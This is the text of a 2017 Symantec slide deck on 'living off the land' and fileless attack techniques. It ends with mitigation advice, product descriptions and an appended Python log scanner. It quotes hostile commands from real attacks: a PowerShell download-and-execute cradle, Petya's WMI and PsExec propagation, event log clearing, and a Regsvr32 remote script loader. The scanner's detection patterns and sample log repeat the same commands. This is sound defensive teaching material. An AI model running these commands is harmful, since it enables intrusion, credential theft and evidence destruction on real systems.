Copyright © 2017 Symantec Corporation
Living off the land
Definition: only pre-installed software is used by the attacker, and no additional binary executables are installed onto the system.
Living off the land
Attackers are using what's already available to attack you:
o Fewer new files on disk → more difficult to detect the attack
o Use of off-the-shelf tools & cloud services → difficult to determine intent & source
o These tools are ubiquitous → hide in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult
  → use simple and proven methods such as email & social engineering
«Fileless» attacks
Multiple fileless methods are possible; not all are truly fileless:
o MEMORY ONLY ATTACKS: e.g. remote code exploits such as EternalBlue and CodeRed
o NON-PE FILES: documents with macros, PDFs with JavaScript, and scripts (VBS, JavaScript, PowerShell, …)
o FILELESS LOADPOINT: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
o DUAL-USE TOOLS: using benign tools, such as PsExec, to do malicious things
Living off the land attack chain
1. INCURSION
o Exploit in memory, e.g. SMB EternalBlue
o Email with non-PE file, e.g. document macro
o Weak or stolen credentials, e.g. RDP password guess
o Remote script dropper, e.g. LNK with PowerShell from cloud
2. PERSISTENCE
o Non-persistent: memory only malware, e.g. SQL Slammer
o Persistent: fileless persistence loadpoint, e.g. JScript in registry
o Persistent: regular non-fileless method
3. PAYLOAD
o Regular non-fileless payload
o Non-PE file payload, e.g. PowerShell script
o Memory only payload, e.g. Mirai DDoS
o Dual-use tools, e.g. netsh or PsExec.exe
Memory only attacks
Run malicious code only in memory, without writing any files to disk:
o Mainly remote code execution (RCE) exploits, like EternalBlue
o CodeRed in 2001 was the first widespread outbreak of this type
o A computer restart will clean/disinfect
o PowerShell can be used to load and execute a payload in memory
Attackers do not always need persistence:
o Mirai bot – re-infects the device after a restart if it gets cleaned
o Targeted attack groups – core systems do not get restarted often
Dual-use tools
System tools and clean applications used for nefarious purposes. Some tools are pre-installed, some are downloaded by the attacker.

Type of internal activity | Purpose | Dual-use tools
Internal network reconnaissance | Enumerate information about a target environment | net user, systeminfo, whoami, hostname, quser, ipconfig
Credential harvesting | Obtain legitimate user credentials to gain access to target systems for malicious purposes | Mimikatz, WCE, pwdump
Lateral movement | Gain deeper access into the target network | PsExec, PowerShell, WMI, RDP
Data exfiltration | Send data back to attackers | FTP, RAR, ZIP, iExplorer, PuTTY, PowerShell, rdpclip
Fallback backdoor | Enables a backdoor that can be used should the main backdoor be removed | net user, RDP, Telnet server
o Many attack groups use common system tools during their attacks
Information gathering commands observed per group:
WATERBUG/TURLA
• systeminfo
• net view
• net view /domain
• tasklist /v
• gpresult /z
• arp -a
• net share
• net use
• net user administrator
• net user /domain
• net user administrator /domain
• tasklist /fi
APPLEWORM/LAZARUS
• hostname
• whoami
• ver
• ipconfig -all
• ping www.google.com
• query user
• net user
• net view
• net view /domain
• tasklist /svc
• netstat -ano | find "TCP"
• msdtc [IP] [port]
BILLBUG
• net user
• ipconfig /all
• net start
• systeminfo
• gpresult
Targeted attacks & dual-use tools

Group name | Reconnaissance | Credential harvesting | Lateral movement | Custom built tools
Tick | whoami, procdump, VBS | WCE, Mimikatz, gsecdump | PsExec | Yes
Waterbug | systeminfo, net, tasklist, gpresult, … | WCE, pwdump | Open shares | Yes
Suckfly | tcpscan, smbscan | WCE, gsecdump, credentialdumper | - | Yes
Fritillary | PowerShell, sdelete | Mimikatz, PowerShell | PsExec | Yes
Destroyer | Disk usage, event log viewer | kerberos manipulator | PsExec, curl, VNC | Yes
Chafer | network scanner, SMB bruteforcer | WCE, Mimikatz, gsecdump, … | PsExec | Yes
Greenbug | Broutlook | WCE, gsecdump, browdump, … | TeamViewer, PuTTY | Yes
Buckeye | os info, user info, smb enumerator, … | pwdump, Lazagne, chromedump, … | Open shares | Yes
Billbug | ver, net, gpresult, systeminfo, ipconfig, … | - | custom backdoor | Yes
Appleworm | net, netsh, query, telnet, find, … | dumping SAM | RDP bruteforcer, rdclip | Yes
Targeted attack groups
o 10 out of 10 groups analyzed used system tools in combination with custom tools during their attacks
o Application whitelisting often does not protect against such attacks
Examples:
o Petya used PsExec, WMI, and LSAdump for lateral movement
o The Calcium/Fin7 group used PowerShell payloads in attacks in 2017
o The attack against the DNC in 2016 used PowerShell for lateral movement and discovery, and used a WMI fileless persistence method
Dual-use tools: global usage
o Mimikatz and PsExec are popular for lateral movement, e.g. Petya
Petya uses dual-use tools
o The threat is a DLL executed by rundll32.exe
o Uses a recompiled version of Mimikatz (LSADump) to get passwords
o Uses PsExec to propagate
  o \\[server_name]\admin$\perfc.dat
  o psexec rundll32.exe c:\windows\perfc.dat #1 <rand>
o Uses WMI to propagate if PsExec fails
  o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe \"%Windows%\perfc.dat\" #1 60"
o Creates a scheduled task to restart into the malicious MBR payload
  o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
o Deletes log files to hide traces
  o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Example: Odinaff group
The Odinaff group used multiple dual-use tools in their attack:
o Mimikatz: an open source password recovery tool
o PsExec: a process execution tool from Microsoft
o Netscan: a network scanning tool
o Ammyy Admin: a remote access tool
o Gussdoor: a custom remote backdoor (Backdoor.Gussdoor)
o RunAs: a tool for running processes as another user
o PowerShell: various commands used
WMI usage in malware
o On average, 2% of malware in our sandbox misused WMI
Usage of dual-use tools - January 2017

Tool | Usage count
sc.exe | 2.7190%
vnc | 2.1176%
net.exe | 1.2733%
powershell.exe | 1.0263%
ipconfig.exe | 0.8227%
netsh.exe | 0.7526%
teamviewer.exe | 0.6224%
tasklist.exe | 0.4963%
rdpclip.exe | 0.3226%
rar.exe | 0.3139%
wmic.exe | 0.3027%
find.exe | 0.2767%
curl.exe | 0.2027%
netstat.exe | 0.1938%
systeminfo.exe | 0.1641%
wget.exe | 0.1208%
nc.exe | 0.1174%
gpresult.exe | 0.1147%
whoami.exe | 0.1109%
ammyy.exe | 0.1061%

o System tools are popular with administrators and cyber criminals alike
o Remote administration tools are often misused by attackers
Usage of dual-use tools
o PowerShell is still gaining popularity with attackers
Malicious documents still popular
o Malicious macro with social engineering
o Embedded binary can be double-clicked
Non-PE files
o Scripts are very popular, especially PowerShell
o Many script toolkits are available
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be quickly adapted if needed
Example PowerShell downloader:
powershell.exe -nop -ep Bypass -noexit -c
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))
Common malware use cases for PowerShell
DOWNLOADER
o PowerShell script used to download a payload to disk or memory
o Often used in email attachments such as WSF or document macros
LOADPOINT
o PowerShell script used as a persistent loadpoint on Windows
o Often stored completely in the registry (fileless), e.g. Kotver, or within WMI
LATERAL MOVEMENT
o PowerShell remoting to execute on a remote computer (Invoke-Command)
o Download and execute Mimikatz, etc. in order to steal credentials
Email script downloaders
(Chart: detections by month for JavaScript and macro downloaders)
Attachment file extensions
o Malicious attachments with HTML code gained popularity in 2017
Prevalence of PowerShell
o 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious
(Chart: volume of PowerShell samples from customers in our sandbox in 2016)
TOP 3 THREATS THAT USE POWERSHELL
1. 9.4% W97M.Downloader
2. 4.5% Trojan.Kotver
3. 4.0% JS.Downloader
Fileless loadpoints
There are many ways to have a loadpoint without adding a new file:
o Windows registry
o Windows Management Instrumentation (WMI)
o Group Policy Objects (GPO)
o Scheduled task
o …
Script embedded in the registry
Common: a Windows registry run key that points to the malware binary file
New trick: a Windows registry run key that contains a script which gets executed
o This script can load more payloads from other registry keys and run them
o As the script is not in a file on disk, it might be missed by traditional security tools
Example: Poweliks
o Multiple stages in the registry
o Uses JavaScript and PowerShell
o Loads a DLL directly into memory
o Decrypted directly in memory
o Uses a non-printable ASCII character to protect its own registry key
Remote SCT load
o A registry run key can also point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
  Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Example: Downloader.Dromedan (40,000 detections / day)
o The embedded JScript uses WMI to execute a PowerShell payload
o The script stores an encoded DLL in the registry for later use
(Figure: Malicious.sct file)
Fileless loadpoints
Similar trigger methods exist for:
o Windows Management Instrumentation (WMI)
o Group Policy Objects (GPO)
o Scheduled task
(Figure: WMI PowerShell backdoor)
Not truly fileless loadpoints
Without additional files, but writing to existing files:
o File infector: infect any file that gets restarted with the PC
o Browser files: infect the core browser files or extensions
o PowerShell profile: add a malicious script to the profile file
o Trigger on shutdown: remove itself once started and write a registry run key when system shutdown is called
o BITSadmin: add a malicious update server as a backdoor
Detection challenges
o If no file is written to disk → security measures might not work
o Lack of indicators of compromise (IoCs) for sharing
o Common malware does not always use a loadpoint anymore
o Symantec has various detection features in place for such threats
Mitigation & best practices
o Monitor the use of dual-use tools inside your network
o Block remote execution through PsExec and WMI (if applicable)
o Enable better logging and process the information (if applicable)
o Enable advanced account security features, like 2FA and login notification (if applicable)
o Protect against password and credential theft, for example with behavior-based security solutions
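As an added example (not part of the Symantec deck), a small Python scanner that puts the first three mitigation points above into practice on process-creation command lines: it flags the specific dual-use behaviours the deck describes (Petya's WMI/PsExec propagation, its event log clearing and forced-reboot task, the Regsvr32 remote SCT loadpoint and the PowerShell download cradle) and reports hosts where several everyday reconnaissance tools run in a burst. The log format, hostnames and URLs are constructed for the example.

```python
import re
from collections import defaultdict
# Constructed process-creation log, one "<host> <command line>" per line; the commands mirror
# the Petya, Dromedan and PowerShell downloader examples in the deck. Hosts, paths and
# [REMOVED] URLs are placeholders, not real telemetry.
SAMPLE_LOG = """\
WS01 ipconfig /all
WS01 whoami
WS01 systeminfo
WS01 tasklist /svc
WS01 powershell.exe -nop -ep Bypass -noexit -c iex ((New-Object System.Net.WebClient).DownloadString('http://[REMOVED]/a'))
WS01 wmic.exe /node:10.0.0.7 /user:CORP\\svc /password:[REMOVED] process call create "C:\\Windows\\rundll32.exe C:\\Windows\\perfc.dat #1 60"
SRV01 psexec \\\\srv02 -s rundll32.exe c:\\windows\\perfc.dat #1 30
SRV01 schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\\Windows\\system32\\shutdown.exe /r /f" /ST 14:42
SRV01 wevtutil cl System
WS02 regsvr32 /s /n /u /i:http://[REMOVED]/m.sct scrobj.dll
WS03 net user
"""
# High-confidence patterns: rarely legitimate, each mapped to a stage of the deck's attack chain.
RULES = [
    ("wmi_remote_process_create", r"\bwmic(\.exe)?\b.*/node:.*process\s+call\s+create", "lateral movement"),
    ("psexec_remote_rundll32", r"\bpsexec\b.*\brundll32", "lateral movement"),
    ("schtasks_forced_reboot", r"\bschtasks\b.*/create.*shutdown(\.exe)?\s+/r", "payload"),
    ("eventlog_cleared", r"\bwevtutil\s+cl\b", "anti-forensics"),
    ("regsvr32_remote_sct", r"\bregsvr32\b.*/i:https?://.*\bscrobj\.dll", "fileless loadpoint"),
    ("powershell_download_cradle", r"\bpowershell.*(-ep\s+bypass|-nop).*(downloadstring|\biex\b)", "non-PE downloader"),
]
# Tools administrators run every day: a single use means nothing, a burst on one host is worth a look.
RECON_TOOLS = ("systeminfo", "net view", "net user", "tasklist", "gpresult", "whoami",
               "hostname", "ipconfig", "quser", "query user", "arp", "netstat")

def parse(log_text):
    # Split each non-empty line into (host, command line).
    return [line.split(" ", 1) for line in log_text.splitlines() if " " in line]

def scan_rules(log_text):
    """Return (host, rule name, stage) for every command line matching a RULES entry."""
    hits = []
    for host, cmd in parse(log_text):
        for name, pattern, stage in RULES:
            if re.search(pattern, cmd, re.IGNORECASE):
                hits.append((host, name, stage))
    return hits

def recon_bursts(log_text, threshold=4):
    """Return hosts that ran at least `threshold` distinct reconnaissance tools."""
    seen = defaultdict(set)
    for host, cmd in parse(log_text):
        for tool in RECON_TOOLS:
            if cmd.lower().startswith(tool):
                seen[host].add(tool)
    return sorted(host for host, tools in seen.items() if len(tools) >= threshold)
```

Plain `net user` or `ipconfig` on its own never fires a rule, which is the point: the everyday tools are monitored and correlated, while only the patterns that rarely have a legitimate use are alerted on directly.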
Protection solutions
Symantec Endpoint Protection (SEP) 14: reputation, machine learning, behavior detection, emulation, exploit mitigation, IPS, …
• Deepsight IoC feeds
• MATI custom reports
• Threat Intelligence
• Managed Security Services (MSS)
• Incident Response (IR) on site
• Data Loss Prevention (DLP)
• …
• Proxy SG secure web gateway
• Security Analytics
• Web Security Service
• Data Center Security (DCS)
• Control Compliance Suite (CCS)
• …
• Public awareness/white papers
• Law enforcement collaboration
• Infrastructure takedowns
• …
• Email Security.cloud
• MAA Sandbox
• Advanced Threat Protection (ATP)
• …
(Diagram groups: Attacker, Organization, Users)
Symantec: Robust protection against fileless threats
Advanced Antivirus Engine
o Symantec uses an array of detection engines, including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory scanning, an emulator and advanced machine-learning engines. This allows for the detection of fileless threats executed directly in memory.
SONAR Behavior Engine
o SONAR is Symantec's real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats.
Email Protection
o Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users. Symantec Messaging Gateway's Disarm Technology can also protect by removing malicious content before it even reaches the user.
Malware Analysis Sandbox
o Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts, including PowerShell scripts. The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior.
Network Protection
o Symantec's Secure Web Gateway, together with IPS and firewall on the endpoint, can monitor and block malicious traffic entering or leaving a system and can help minimize the impact of attacks. Suspicious content can be automatically analyzed in sandboxes.
System Hardening
o Symantec's system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of scripts and any of their actions.
Visibility and Services
o Symantec's Managed Security Services can help with threat intelligence, with proactive threat hunting, as well as with incident response handling.
Conclusion
o Nearly all targeted attack groups use system tools in their attacks
o Sandboxes are often not able to handle fileless attacks properly
o Fileless attacks are difficult to detect as they leave fewer traces
o Application whitelisting will not protect against all living off the land tactics
o Script attacks, especially PowerShell, are increasing
Further reading
o BLOG: Attackers are increasingly living off the land
o WHITEPAPER: Living off the land and fileless attack techniques